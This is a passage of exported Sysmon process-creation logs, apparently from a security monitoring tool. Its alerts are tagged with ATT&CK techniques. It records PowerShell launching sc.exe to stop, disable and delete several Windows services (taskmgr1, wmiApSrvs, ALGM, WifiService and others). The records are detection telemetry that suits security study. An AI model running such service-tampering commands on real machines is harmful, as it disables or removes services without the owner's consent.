sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop taskmgr1\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.334"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-0010f0872e00}"",""processId"":""960"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop taskmgr1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo 
-NoProfile""}}}", +"May 29, 2020 @ 14:20:32.234",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.322 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-001025872e00} +ProcessId: 4208 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config taskmgr1 Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config taskmgr1 Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.324079800Z"",""eventRecordID"":""3481"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.322\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-001025872e00}\r\nProcessId: 4208\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 
(WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config taskmgr1 Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.322"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-001025872e00}"",""processId"":""4208"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config taskmgr1 Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:32.205",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.288 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-00104a852e00} +ProcessId: 1528 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop wmiApServs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
wmiApServs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.290914900Z"",""eventRecordID"":""3479"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.288\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-00104a852e00}\r\nProcessId: 1528\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop wmiApServs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.288"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-00104a852e00}"",""processId"":""1528"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop wmiApServs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:32.156",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.231 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-001065822e00} +ProcessId: 4508 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop wmiApSrvs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 
+ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop wmiApSrvs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.234025500Z"",""eventRecordID"":""3476"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.231\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-001065822e00}\r\nProcessId: 4508\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop wmiApSrvs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:04.231"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-001065822e00}"",""processId"":""4508"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop wmiApSrvs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:32.130",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.195 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-00107e802e00} +ProcessId: 8064 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete ALGM +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete ALGM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.197468900Z"",""eventRecordID"":""3474"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.195\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-00107e802e00}\r\nProcessId: 8064\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete ALGM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.195"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-00107e802e00}"",""processId"":""8064"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete ALGM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:32.109",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.175 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010847f2e00} +ProcessId: 7604 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ALGM +CurrentDirectory: C:\Users\John 
Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ALGM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.186571900Z"",""eventRecordID"":""3473"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.175\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010847f2e00}\r\nProcessId: 7604\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ALGM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.175"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-0010847f2e00}"",""processId"":""7604"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ALGM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:32.063",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.112 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010387c2e00} +ProcessId: 3592 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) 
+Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WifiService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WifiService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.133597300Z"",""eventRecordID"":""3470"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.112\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010387c2e00}\r\nProcessId: 3592\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WifiService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John 
